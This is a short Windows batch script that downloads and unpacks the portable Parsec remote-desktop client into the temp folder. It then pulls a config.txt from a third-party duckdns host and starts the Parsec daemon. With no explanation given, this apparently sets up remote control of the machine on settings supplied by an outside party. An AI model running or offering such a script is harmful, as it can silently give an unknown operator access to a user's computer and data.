@echo off mkdir "%temp%\Parsec" curl https://builds.parsecgaming.com/package/parsec-flat-windows.zip -o "%temp%\Parsec\parsec.zip" powershell -command "Expand-Archive -Path '%temp%\Parsec\parsec.zip' -DestinationPath '%temp%\Parsec' -Force" del "%temp%\Parsec\parsec.zip" curl parsec.nanahirafan.duckdns.org/config.txt -o "%temp%\Parsec\config.txt" -fsSL start /d "%temp%\Parsec" parsecd.exe